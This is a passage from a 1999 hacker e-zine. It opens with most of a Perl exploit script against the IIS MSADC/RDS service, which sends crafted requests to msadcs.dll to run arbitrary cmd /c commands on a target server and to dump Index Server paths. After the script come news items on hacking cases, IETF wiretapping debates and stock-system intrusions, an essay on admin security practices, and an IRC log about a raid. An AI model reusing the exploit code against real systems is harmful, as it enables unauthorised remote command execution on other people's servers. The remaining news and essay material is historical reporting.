save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;");
exit;}
else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}
##############################################################################
sub odbc_error {
my (@in)=@_; my $base;
my $base = content_start(@in);
if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
return $in[$base+4].$in[$base+5].$in[$base+6];}
print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n";
print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
$in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}
##############################################################################
sub verbose {
my ($in)=@_;
return if !$verbose;
print STDOUT "\n$in\n";}
##############################################################################
sub save {
my ($p1)=@_; my $ropt="";
open(OUT, ">rds.save") || print "Problem saving parameters...\n";
if (defined $args{c}){ $ropt="c ";}
if (defined $args{V}){ $ropt.="V ";}
if (defined $args{w}){ $ropt.="w ";}
print OUT "v2\n$ip\n$ropt\n$p1\n";
close OUT;}
##############################################################################
sub load {
my ($action)=@_;
my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};";
open(IN,"<rds.save") || die("Couldn't open rds.save\n");
@p=<IN>; close(IN);
die("Wrong rds.save version") if $p[0] ne "v2\n";
$ip="$p[1]"; $ip=~s/\n//g;
$target= inet_aton($ip) || die("inet_aton problems");
print "Resuming to $ip ...";
@switches=split(/ /,$p[2]);
foreach $switch (@switches) {
$args{$switch}="1";}
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;
$torun="$p[3]"; $torun=~s/\n//g;
if($torun=~/btcustmr/){
$args{'c'}="1";} # this is a kludge to make it work
if($torun=~/^dbq/){ $torun=$drvst.$torun; }
if(run_query("$torun")){
print "Success!\n";} else { print "failed\n"; }
exit;}
##############################################################################
sub create_table {
return 1 if (!defined $args{c});
return 1 if (defined $args{V});
my ($in)=@_;
$reqlen=length( make_req(2,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(2,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 1 if $temp=~/Table 'AZZ' already exists/;
return 0;}
##############################################################################
sub known_dsn {
foreach $dSn (@dsns) {
print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
if(run_query("DSN=$dSn")){
print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";}
##############################################################################
sub is_access {
my ($in)=@_;
return 1 if (!defined $args{c});
return 1 if (defined $args{V});
$reqlen=length( make_req(5,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(5,$in,""));
my $temp= odbc_error(@results);
verbose($temp); return 1 if ($temp=~/Microsoft Access/);
return 0;}
##############################################################################
sub run_query {
my ($in)=@_; my $req;
if (defined $args{c}){$req=3;} else {$req=6;}
$reqlen=length( make_req($req,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req($req,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 0;}
##############################################################################
#crippled
##############################################################################
sub hork_idx {
print "\nAttempting to dump Index Server tables...\n";
print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
$reqlen=length( make_req(4,"","") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(4,"",""));
if (rdo_success(@results)){
my $max=@results; my $c; my %d;
for($c=19; $c<$max; $c++){
$results[$c]=~s/\x00//g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
$results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
$d{"$1$2"}="";}
foreach $c (keys %d){ print "$c\n"; }
} else {print "Index server not installed/query failed\n"; }}
##############################################################################
sub dsn_dict {
open(IN, "<$args{e}") || die("Can't open external dictionary\n");
while(<IN>){
$hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
if(run_query("DSN=$dSn")){
print "Success!\n"; save ("dsn=$dSn"); exit; }}}
print "\n"; close(IN);}
##############################################################################
sub content_start { # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++) { # assume there's less than 500 headers
if($in[$c] =~/^\x0d\x0a/){
if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
else { return $c+1; }}}
return -1;} # it should never get here actually
##############################################################################
sub funky {
my (@in)=@_; my $error=odbc_error(@in);
if($error=~/ADO could not find the specified provider/){
print "\nServer returned an ADO miscofiguration message\nAborting.\n";
exit;}
if($error=~/A Handler is required/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}
if($error=~/specified Handler has denied Access/){
print "\nADO handlers denied access (they most likely are patched)\n";
exit;}
if($error=~/server has denied access/){
print "\nADO handlers denied access (they most likely are patched)\n";
exit;}}
##############################################################################
#crippled
##############################################################################
sub use_unc {
$uncpath=$args{u};
$driverline="driver={Microsoft Access Driver (*.mdb)};dbq=";
if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){
print "Your UNC path sucks. You need the following format:\n".
"\\server(ip preferable)\share\some-file.mdb\n\n"; exit; }
if(create_table($driverline.$uncpath)){
if(run_query($driverline.$uncpath)){
print "Success!\n"; save ("dbq=".$uncpath); exit;}}
}
##############################################################################
sub get_name { # this was added last minute
my $msadc=<<EOT
POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: 126
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0
--!ADM!ROX!YOUR!WORLD!--
EOT
; $msadc=~s/\n/\r\n/g;
my @results=sendraw($msadc);
my $base=content_start(@results);
$results[$base+6]=~s/[^-A-Za-z0-9!\@\#\$\%^\&*()\[\]_=+~<>.,?]//g;
print "Machine name: $results[$base+6]\n";}
##############################################################################
# special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm,
# #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and
# good friends!), wiretrip, l0pht, nmrc & all of phrack
#
# thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
#
# I wish I could really name everyone, but I can't. Don't feel slighted if
# your not on the list... :)
##############################################################################
@HWA
06.0 Online encrypted privacy for email and WWW
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Submitted by: Ed
URL: https://ca.privacyx.com/
The PrivacyX website is an anonymous and encrypted web based email system that
allows you to send encrypted anonymous email through their pop3 servers, You
will have to accept a signed certificate from their site and install it on your
system, the site currently only offers 512 bit keys presumeably to keep the
international nature of the site open. Once you have edited your config to use
the mail.privacyx.com servers you are ready to send and receive email using the
service. A test email sent an hr ago still has not arrived as of yet, i'll update
when (if) it comes through.
@HWA
07.0 More on the Chris Buckley Saga
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Abattis
From http://www.theregister.co.uk/991119-000003.html
Posted 19/11/99 11:56am by Linda Harrison
0800 court case adjourned...
Chris Buckley, the teenager accused of using a BT 0800 number to access the Web
without permission, yesterday had his case adjourned to December.
The 18-year-old had his appearance at Corby Magistrates Court, Northamptonshire, put
back to December 3 to enable his solicitor to take instructions.
Buckley, from Oundle, Northamptonshire, allegedly used a BT freephone number to access
the Net without authorisation or permission.
He faces three charges: gaining unauthorised access to the Internet; posting material on
newsgroups that may have caused "an annoyance"; and using profanities. �
-=-
Posted 18/05/99 11:44am by Tim Richardson
Fraud charges follow abuse of BT 0800 test number
An anonymous Net user has been accused of fraud and threatened with legal action for
using a toll-free number to access the Web that was reserved for use by BT staff.
A letter, purportedly sent by BT customer relations manager Keith Lawton, orders the
unnamed customer to cough up for the 680 hours and 45 minutes spent online illegally -- or
face legal action.
The letter also warns the crafty BT customer that if he/she does it again, the police will be
called "with a view to criminal charges being brought".
Having already issued a warning to stop using the number, Lawton wrote: "By continuing to
use that freephone number you have committed fraud against us."
"As you have knowingly used our internal ISP without our express authorisation, we are
billing you for all the time that you have been online using our freephone number by
converting all time spent online to a national number," Lawton wrote.
There is no indication exactly how much the bill is for but it could run into many hundreds of
pounds.
A spokesman for BT said the company would not comment on an individual customer's bill
and also questioned the validity of the letter
It could be genuine, or it could be a hoax, he said.
Since no one is prepared to say one way or the other, The Register has decided to let its
readers decide whether it's kosher or not.
Check out the letter here: http://www.angelfire.com/ar/bt0800/
-=-
Posted 19/05/99 11:44am by Tim Richardson
BT fraud letter outed as a fake
The letter accusing a BT customer of fraud is bogus, according to a learned reader of The
Register.
Matthew Garrett, a medical student at Cambridge University said: "The alleged letter from
BT is a fake.
"Putting it through a colour filter reveals that the BT logo in the top left corner and the bar
code and footer have been scanned in and pasted on top of a computer-generated
document.
"Creases are also clearly visible around the staple region, but oddly enough aren't
anywhere else on the page.
"And as a final nail in its coffin, the background of the main page is full red, green and blue,
a value that is highly unlikely to occur in nature since paper tends to be slightly off-white.
"The rest of the page is plain and perfect white, which would only occur in a
computer-generated image.
"Hence it is fake.
"If anyone can produce that with a scanner and a perfectly ordinary sheet of paper, I'd be
greatly impressed.
"My version of it is here, and I know there's some other enhanced copies floating around,"
he said.
http://www-jcsu.jesus.cam.ac.uk/~mjg59/0800.jpg
To see yesterday's story about the alleged fake letter, click here.
After his thorough job on this little number it looks like Matthew will have no problems sailing
through his post mortem course. �
-=-
non related story;
Posted 12/11/99 3:41pm by Tim Richardson
22,000 people and the 08004u security lapse
It seems the 22,000 or so people who gained totally toll-free access to the Net earlier this
week courtesy of Scottish ISP, 08004u, didn't even have to blag their way past password
security.
That's because there was no security. It simply didn't exist. Any login ID and password
would have got them into 08004u's network and onto the Web, The Register has learned.
According to some of those who took advantage of the Scottish ISP's generosity, 08004u
just left the doors wide open allowing anyone to walk in completely uncontested.
"I could dial their 0800 number, and have the login IAMCOOL and password ANYTHING,
and it would work," wrote one Net user who asked to remain anonymous.
"I find this to be an insult to the people that are paying their �50 a month [for unmetered
access]," he said, revealing he was one of 08004u's subscribers.
It'll be interesting to know how 08004u is planning to pay for this charity...after all, there's no
such thing as a free lunch. �
@HWA
08.0 Security Practices Today, Or Lack Thereof
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Erik
A new article in the Buffer Overflow section illustrates
what system administrators are doing these days in the
way of security. You may be surprised, or not, at what
some administrators consider to be secure computing
practices.
Buffer Overflow
http://www.hackernews.com/orig/buffero.html
Security practices today. Or lack thereof
By: Erik Parker - Bio
Mind Security
Companies are not giving computer security the attention
that it needs. I have interviewed several System
Administrators and Security Administrators. What I found
was what I had expected, that things just aren't getting
done the way they should be.
Most companies that have over 100 employees have their
own computer operations staff. Unix Administrators, NT
Administrators, Novell Administrators, Etc., of course all
depending on the individual network. Companies that are
computer companies, making software, doing internet
business, or depend on every single user using their
computer usually have larger network staffs, makes sense
right?
All too often network security is not a concern on these
smaller networks. Even more sad than that, all to often it
isn't a concern on larger networks. Networks with
thousands of users, and a fulltime staff of administrators,
or companies who have permanent in house contractors.
"Network Security" is left up to the Administrators. That
isn't so bad if your administrators happen to be security
specialists. However, most of the time that isn't the case.
Companies expect their network to be secure, or just
don't expect. Many places don't have policies, or have a
plan to someday start one, but don't want to bother until
it becomes a problem, after they have been hacked, or an
inside info starts leaking out, and the SEC is coming down
their throat.
We interviewed 7 Unix Administrators, and 3 NT
Administrators. We didn't gain any worthwhile knowledge
from the NT Administrators, as none of them knew about
security or were concerned with it. If I had more time, I
could have interviewed some that dealt with their own
firewalls and all the network security. So from here on
out, I will refer to only Unix Admins. All of the Unix Admins
we interviewed were in charge of keeping their machines
secure. Some were in charge of their firewall, some
weren't.
The Most common security practice was simply shutting
down services that weren't needed. End of story. Other
cases the Admins would keep lists of patch levels, and
every couple of months go out and check for new versions
of their daemons they were running. Many of them didn't
know how to search their machines for SUID binaries, and
couldn't understand why it would matter. Several others
claimed that they didn't bother to shut down services,
because the firewall blocked all incoming connections to
those machines except on specific ports, like SMTP and
HTTP. When I asked those Admins if they were in control
of their entire network, some were, and some weren't.
The ones who weren't, claimed to know that there were
other points of entry into the network besides the firewall
that controls direct access to their specific server cluster.
I asked a specific set of questions to each person, I never
went on to ask questions to counter their responses.
Mainly because if I had, I would have been teaching them
security, and putting thoughts into their head. Well, that
is why this article is being written. I was surprised to hear
a few administrators tell me that they didn't worry about
security breaches, because there was nothing on their
network that hackers or crackers would care about. I
guess I had to chuckle about that.
There doesn't have to be top-secret files, some new
operating system, or something that is plainly obvious.
Most of the hacks and cracks that you hear about, are
done for web page changes. That seems to be what is in
the media most often. Many hacks go unreported as well,
for reasons of the stock market, embarrassment, and
several Admins won't even admit to their own boss after
finding out about the hack, as they think it will be thought
of as their fault. Which, unless they are the security
admin, and properly trained in it, it shouldn't be their fault.
Companies often hire Security Penetration engineers, or if
you will, strike teams, to break into their network, and
test security. From outside or inside. Sometimes they
don't bother to give these teams user level access, which
is very stupid, since regular users could be the very
problem. Also quite often a machine will be compromised
via a daemon that isn't running as root, and only granting
the hacker the daemons user level access, and from that
they can gain root access from local exploits, the same
local exploits some companies never have the strike teams
check for.
Some of the Security Administrators I spoke to, gave me a
quick run down of what they do to secure a network.
Their quick list was to setup a firewall and only allow the
access that was needed. I won't go into detail about
proper firewall rules and such, I don't want to get that
technical here. They also said they would remove utilities
that aren't going to be used on the servers. For instance,
an ultra 5 with Solaris 7 on it, that has one function, to
run Apache and serve web pages all day, and do nothing
else. Does it need the capability to print? Does it need
Openwindows or CDE installed? No. These Admins would
remove packages not needed, and other ones that aren't
in use by the system. Others that may be used by the
Admins at some point, and are Set UID root, get their
sticky bit removed. Users don't need root level access to
most of these. On most systems, if you would like to see
all of the files on it that are SUID root, issue this
command:
`find / \( -perm -4000 -o -perm -2000 ! -type d \) -exec
ls -ldb {} \; >> output.log`
The other things the Admins said they would do, are to
keep up to date on all of the patches, and actively keep
up with their software. I personally get on the maker of
the software's mailing list, development lists, and user list.
This makes for a pretty busy procmail, but you will catch
things early on. Other things Security Admins do are to
secure every machine, and any machine they aren't in
control of they don't trust from anywhere on their
network. They of course shut off all services not needed,
like 98% of what is in /etc/inetd.conf. Any daemon that
will run properly chrooted to its own directory gets set
that way. Any program that can run as a non-privileged
user get set that way.
There is more that a dedicated Security Administrator
does, but there is just too much to go through. Keep In
mind that you should never install software from binary
distributions if possible. With source you read the source if
you wish, and compile without the extra options you may
not need. Often exploits for programs are in features in
the software that you didn't really need, but got compiled
in by default. Something I am not touching on too much,
but intrusion detection can be a good way to go as well.
There are many types of software and even hardware
that does it. You can monitor your systems for attacks,
attempts, or full-blown break-ins. There is a software
called "Anti-Sniff", that is just that.. It is a sniffer
detector. If one of your machines is compromised, and
someone is sniffing your network for passwords, data, or
some other information, this will detect it. You can find
Anti-sniff at http://www.l0pht.com/antisniff/. We also
recommend for networks with more than a couple
machines, setting up a dedicated log host. This machine
serves ONE function, and one alone, to log. You setup all
your remote machines to have their syslog piped off to
this machine. It doesn't need to be a huge box, or an
expensive box. I have used a 486-100, running Linux on it,
and had 35 servers logging to it. Put a 20 gig drive in it,
and have it compress logs every so often. Works like a
dream. If you use a big server for it, you will often find
your management having this "Great Idea" to use it to run
other services as well. I personally have been asked
before to make our loghost the ssh gateway from the
outside, I hope you can see the problems in that yourself.
Something else that is difficult for companies to
understand and put up with, and many don't, and end up
suffering because of it, are the fact that many skilled
Administrators spend a lot of time associating them selves
with what would be classified by the media and the US
government as Black hat hackers. However, they are the
very people we are protecting networks against, and they
often get information before we do. They are often a
great resource for information, and even for tips when you
have questions. You have to know both sides to be
successful. We aren't hurting them any by securing the
networks. There will always be networks out there that
aren't secure. It also gives them more of a challenge in
life, which is often something they consider fun. I
personally don't believe in the labeling of White hats or
Black hats, as many people who are considered to be
black hats, go to work every day in a suit and tie, get
paid 150k a year, and are the best security administrators
there are. There isn't a ton like that, but some of them
are batting for both teams. What would that make them,
gray hats?
There is a bigger problem that exists. It is what we call
Upper Management. You know, the person who signs your
purchase orders, gives you your paycheck, and the same
person who never thinks about security. It costs money,
and that is bad. They think because they don't see a
problem, don't fix. What stupid logic that is. You won't
ever see a skilled hacker, as they will come in, get what
they want, and disappear and perhaps never run across
your network again. I think it is much better to have a
cracker hit a site, than a hacker. I'd much rather have a
server erased, or a web page changed, than to have a
hacker come in, and rip off software, or documents, or
project plans that my company has been working on for
years, and sell it to competitors, or post them on some
stock board, and make my company's stock fall 50%.
Upper management doesn't care about that. They either
don't understand what security is, or just don't think it
could happen to them. The problem is, you will rarely,
most likely never look like a hero at your company. If you
do get the go ahead to do serious security work, hire an
outsider, or hire a fulltime security admin, and they do a
good job, you won't get hacked. Life goes on as it was,
and it seems like a waste of money. Your boss doesn't
lose sleep at night thinking about how insecure your
network is, but you might, since it is your fault either way
if it gets hacked. If you don't implement security, then
you are certainly not shown off as a hero, unless you
track him down, file suit, and he happens to be rich, and
your company makes a boatload of money. Not likely going
to happen, once its reported to the FBI, and they do their
research, and maybe even raid someone, its years later,
and you have moved on to a new company.
You have to think up every single problem on the network,
what could happen, and show it to your boss. Make a
chart, show problems, and show costs. In most cases the
cost of cleanup, and potential loss of money, is far more
than hiring a security staff. Some Upper Management
understand more clearly if you put it simply, such as "Do
you get the oil in your Porsche changed from every three
to five months? Even though nothing was wrong?". Most
likely they do, or at least know that they SHOULD. That is
a fact, that keep up the maintenance schedule, and you
have less problems. Well, same way with computers. It is
difficult in most companies, very difficult. Even worse if
you are working for the government, since every penny
has to be cleared, and it takes time. Most of the time you
either end up doing it and never getting recognized, or
paid. If you don't have the time, well, that would explain
why you see so many government cracks listed on web
page defacement sites like attrition.org.
It is a difficult job, and if you work for a consulting
company, you are in luck. It most likely isn't your job to
sell the audits, you just do them for the company who
was convinced that they needed it. You do have a harder
job though, and that is writing up a security policy, and
making the company understand they MUST follow it.
Many just want their network locked down, and don't are
about a policy. If you only care about the money, so be
it. If you care about doing the best job you can, getting
the security done right, you need to make them
understand they have to make your security policy, well,
policy.
Security today, and in the past, just isn't what it needs to
be. Most companies consider it to be a pain, and an
expense that isn't needed or justified. Companies need to
focus on the area, and big companies need to hire a
fulltime security admin, or keep an open account with a
contractor for routine security audits, and have their
administrators trained on keeping up to date on things. All
companies should have someone who monitors mailing lists
like Bugtraq, or NT Bugtraq, depending on what platforms
you are running.
Things need to change, and if you are in a position where
you can do that, I suggest you do it right now. If you
firmly believe in the future of the Internet, and
E-commerce, I also know that if I were the only person
buying things on-line, every e-commerce site would shut
down, because I just can't afford to keep them all going.
I've talked to a couple of people who say they won't buy
anything online. They don't think their credit cards are
secure, or their personal information. People are scared of
it, and they keep hearing about hackers, and all these evil
things going on that they don't understand. Many web
sites try to comfort people, by explaining the encryption
method for the browsers, and leave it at that. For the
people who have been living under rocks, and have only
heard about credit card stealing, and not about hacking,
and computers being compromised, or for the people who
just don't understand what that means, they think their
data going encrypted is all there is to it. Many people
don't realize when hackers get credit card numbers, they
get them in bulk usually, rarely from sniffing, but from
compromising the machine that holds these plain text files,
or databases holding the information.
@HWA
09.0 Internet Wiretapping Still a Possibility
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Brian Oblivion
While approximately fifty-five percent of the Internet
Engineering Task Force voted against a measure to
include wiretapping capabilities into new protocols there
was not a high enough objection to close the issue
permanently. The director of the transport area of the
IETF said that unless the proposal receive a much
stronger objection the possibility of including these
features still exists.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2392616,00.html?chkpt=zdnnstop
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Internet wiretapping still a threat
By Robert Lemos, ZDNN
November 11, 1999 5:24 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2392616,00.html
A push by law enforcement to make the Internet wiretap-friendly hit a major snag on Wednesday,
when members of the Internet Engineering Task Force -- the body responsible for setting Internet
standards -- overwhelmingly said 'no' to a key question.
The question: Should the IETF put features in forthcoming protocols whose sole purpose is to
facilitate wiretapping?
Scott Bradner, director of the Transport Area of the IETF -- where the motion was originally
proposed -- estimates that 55 percent of the members answered 'no,' another 15 percent said 'yes,'
and the rest abstained.
Not resolved
While that may seem definitive, Bradner stressed that the issue remains open.
"The IETF doesn't vote; we work on rough consensus," said Bradner, who stressed that without a
large majority -- say, 80 percent -- of its members voting one way, the issue would not be resolved.
"After the meeting, we are still in somewhat of an ambiguous area," he said. "There is clearly not
strong support for doing it, but there is not strong enough support to definitively block wiretapping
from future standards."
That leaves the issue tabled for the moment, but certain to be brought up again.
"This is just the beginning," said Jim Dempsey, senior staff counsel with the policy think tank Center
for Democracy and Technology, who attended the meeting. "The vote was about 10 to 1 against, but
that won't stop it."
Expanding wire-tapping
The whole Internet wiretapping concept is a direct result of the Communications Assistance for Law
Enforcement Act of 1994, which requires telecommunications companies to aid law enforcement in
legally obtained wiretaps by making their network infrastructure wiretap-friendly.
For the past two years, law enforcement officials have been lobbying Congress
and putting pressure on cellular phone companies to apply the law to their
phone network as well. The Internet is the next communications network on
the list.
"If it is a one or a zero, or an analog signal, the government is entitled to
intercept the signal," said CDT's Dempsey. "But does that mean they can force
companies to design their systems to make it easy to get the signals they want,
when they want it? That's the CALEA question."
Privacy advocates such as the Electronic Privacy Information Center spoke
out adamantly against a pro-wiretapping Internet.
"... We believe that such a development would harm network security, result in
more illegal activities, diminish users' privacy, stifle innovation, and impose
significant costs on developers of communications," wrote EPIC in an open
letter to the IETF. "At the same time, it is likely that Internet surveillance
protocols would provide little or no real benefit for law enforcement."
Fear of hacking
The IETF answered more out of security concerns than any thoughts about privacy, said Bradner.
"If you put in some mechanism where someone with legal authority can tap your telephone, what
stops some hacker from doing that?" he asked.
The FBI could not be reached for comment on the issue.
In any event, the whole debate may be moot. The vote just barred specific development of features
solely for wiretapping, but other pieces already present in the Internet could be used to create an
effective wiretap.
"Some people think that all the functions necessary to do an intercept may already be in the protocol
for other reasons," said Bradner.
For example, the Internet allows servers to do accounting: Finding out where a packet came from
and where it is going. In wiretapping, such a feature is called a pen register and is considered the
first step in narrowing down the calls that need to be tapped.
CDT's Dempsey believes the vote may be moot for a different reason.
"Two thousand engineers get in a ballroom and raise their hands -- that means nothing to the
government," he said. "What it DOES mean is that they will have to go to the CEOs ... and make
their case."
@HWA
10.0 Stock Prices Manipulated in China
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by no0ne
Zhao Zhe, 28 and a former trust firm employee, received
three years of jail time from a Chinese court and was
ordered to pay restitution for breaking into a
computerized trading system, and manipulating stock
data. This allowed the pair to sell shares at higher
prices.
CNNNfn
http://www.cnnfn.com/1999/11/12/emerging_markets/wires/china_hacker_wg/
Wired
http://www.wired.com/news/reuters/0,1349,32512,00.html
Nando Times
http://www.techserver.com/noframes/story/0,2294,500057111-500094072-500360224-0,00.html
CNNNfn
Chinese hacker jailed
Former trust firm staffer found guilty of
hacking into stock system
November 12, 1999: 10:24 a.m. ET
SHANGHAI (Reuters) - A Chinese court jailed a
former trust firm worker for three years Friday for
hacking into a computerized stock trading system
and manipulating prices, a court official said.
The Shanghai court found Zhao Zhe, 28, guilty of
rigging stock data so that he could sell shares at
inflated prices, he said.
Zhao, a former employee of the Shanghai branch
of the Shijiazhuang Trust and Investment Co., was
also ordered to pay 2.9 million yuan ($355,200) in
compensation for trading losses, had illegal income
confiscated and was also fined 10,000 yuan.
"This is a rare case for China," said the court
official. "We don't see hackers breaking into stock
trading systems very often."
The court found Zhao guilty of breaking into the
computer system of the Shanghai branch of a
securities company and inflating the prices for
Shanghai Xing Ye Real Estate Co. and Henan Lotus
Flower Gourmet Powder Co.
Prices of the two companies' domestic shares
rose their daily limit of 10 percent in unusually heavy
trade as a result of the price manipulation, according
to the official media.
The Shanghai stock exchange has said prices in
its computerized system were affected by the false
information and it has vowed to take steps to
strengthen computer security.
-==-
Wired;
Stock Hacker Jailed in China
Reuters
8:00 a.m. 12.Nov.1999 PST
SHANGHAI -- A Chinese court jailed a former trust firm worker for
three years on Friday for hacking into a computerized stock trading
system and manipulating prices, a court official said.
The Shanghai court found Zhao Zhe, 28, guilty of rigging stock data
so that he could sell shares at inflated prices, the official said.
Zhao, a former employee of the Shanghai branch of the Shijiazhuang
Trust and Investment Co., was also ordered to pay 2.94 million yuan
(US$355,200) in compensation for trading losses, had his illegal
income confiscated and was fined an additional 10,000 yuan.
"This is a rare case for China," said the court official. "We don't
see hackers breaking into stock trading systems very often."
The court found Zhao guilty of breaking into the computer system of
the Shanghai branch of a Hainan securities company and inflating the
prices for Shanghai Xing Ye Real Estate Co. and Henan Lotus Flower
Gourmet Powder Co.
Prices of the two companies' domestic currency A shares rose their
daily limit of 10 percent in unusually heavy trade as a result of
the price manipulation, according to the official media.
The Shanghai stock exchange has said prices in its computerized system
were affected by the false information and it has vowed to take steps
to strengthen computer security.
Copyright 1999 Reuters Limited.
-=-
Nando Times;
China jails hacker for 3 years
Copyright � 1999 Nando Media
Copyright � 1999 Agence France-Press
From Time to Time: Nando's in-depth look at the 20th century
BEIJING (November 14, 1999 8:07 a.m. EST http://www.nandotimes.com) -
In the first such case in China, a computer hacker convicted of manipulating
prices on the Shanghai Securities Exchange was sentenced to three years in
prison, state media said Sunday.
Zhao Zhe, a staff member at a securities company, broke into the computer
system of the Shanghai Securities Department of the Sanya Zhongya Trust
Investment Company and changed five transaction records, the Xinhua news
agency said.
He caused the turnover of two stocks to rise drastically and brought about a
direct loss of 2.95 million yuan (the equivalent of $355,000), Xinhua said.
The hacker was also fined 10,000 yuan - the equivalent of $1,200.
@HWA
11.0 Rumours: Vent of Level Seven raided by FBI?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This came to light on one of the channels I frequent, its unconfirmed at
this point but looks bad for vent if this is true. Keep in mind people
say all sorts of stuff on IRC and its not all true, although I see no
reason for vent to make something like this up - Ed
[12:05] <tnev> _________________________________________
[12:05] <tnev> | tnev (vent@ccxxxxxx-a.xxxxxx.xx.home.com)
[12:05] <tnev> | name : beat cancer, over dose [Level Seven]
[12:05] <tnev> | chan : <deleted>
[12:05] <tnev> | serv : irc.home.com
[12:05] <tnev> | idle : 8hrs 45mins 40secs
[12:05] <tnev> heh, im idle too much
[12:05] <tnev> yea, i got fucking raided
[12:05] <tnev> i gotta go to court
[12:06] <tnev> and shit
[12:06] <tnev> prolly scared straight
[12:06] <tnev> for everything else i did
[12:07] <tnev> ...maybe.
[12:07] <tnev> level seven is surely dead
[12:07] <tnev> fbi knows about us
[12:07] <tnev> and they wanna give us 12 yrs for the usembassy hack
[12:07] <tnev> cause of some 'stolen documents'
[12:08] <tnev> and because of the message we left
[12:08] <tnev> on the site
[12:08] <tnev> 3 days after the actual usembassy bombing
@HWA
12.0 Electronic Information Stolen from Egypt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
With all the hype about electronic break ins,
cyber-intruders, and internet terrorists it is sometimes
easy to forget about the physical world. On October 6th
of this year Egypt discovered several computer disks
had been stolen from the University of Cairo. The disks
contained classified information about the country's
natural resources such as gold, copper and uranium
reserves.
Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500057186-500094173-500360964-0,00.html
Secrets about Egypt's natural resources stolen
Copyright � 1999 Nando Media
Copyright � 1999 Agence France-Press
For more about Africa, visit Africa News Online.
CAIRO (November 14, 1999 12:10 p.m. EST http://www.nandotimes.com) -
Egyptian police are investigating the Oct. 6 theft from Cairo University
of dozens of computer disks containing classified information about the
African nation's natural resources, university security officials
disclosed Sunday.
University employees, including members of the geography department, are
being questioned about the theft, which took place more than a month ago,
but the officials said the investigation had not yet yielded any results.
The disks contain information on the location of oil, gas and uranium
fields as well as gold and copper deposits and other classified
geographical information, university sources said.
The pro-government Al-Ahram newspaper reported that the disks also
contained the results of all Egyptian geographical studies carried out
over the past two centuries.
It was not clear if the disks contained the only copies of the information
or why the Oct. 6 crime has not been publicized before now.
In early 1998, Egypt had oil and gas reserves of 1,090 million oil equivalent
tons, according to oil ministry sources. No figures were available for gold
and uranium reserves.
@HWA
13.0 Aleph One Gives NPR Interview
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by oolong
Aleph One (Elias Levy), the administrator of the BugTraq
mailing list and the CTO of Security Focus.com, was
interviewed on National Public Radio on the topic of
"Cyber Terrorism" last Friday.
NPR - archived .ram file of the interview
http://www.npr.org/ramfiles/me/19991112.me.10.ram
@HWA
14.0 South American Con Announced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Space Rogue
Whoa, a hacker convention in Bogota, Colombia. Its
coming up very soon. Check out Col Con '00.
HNN Cons Page
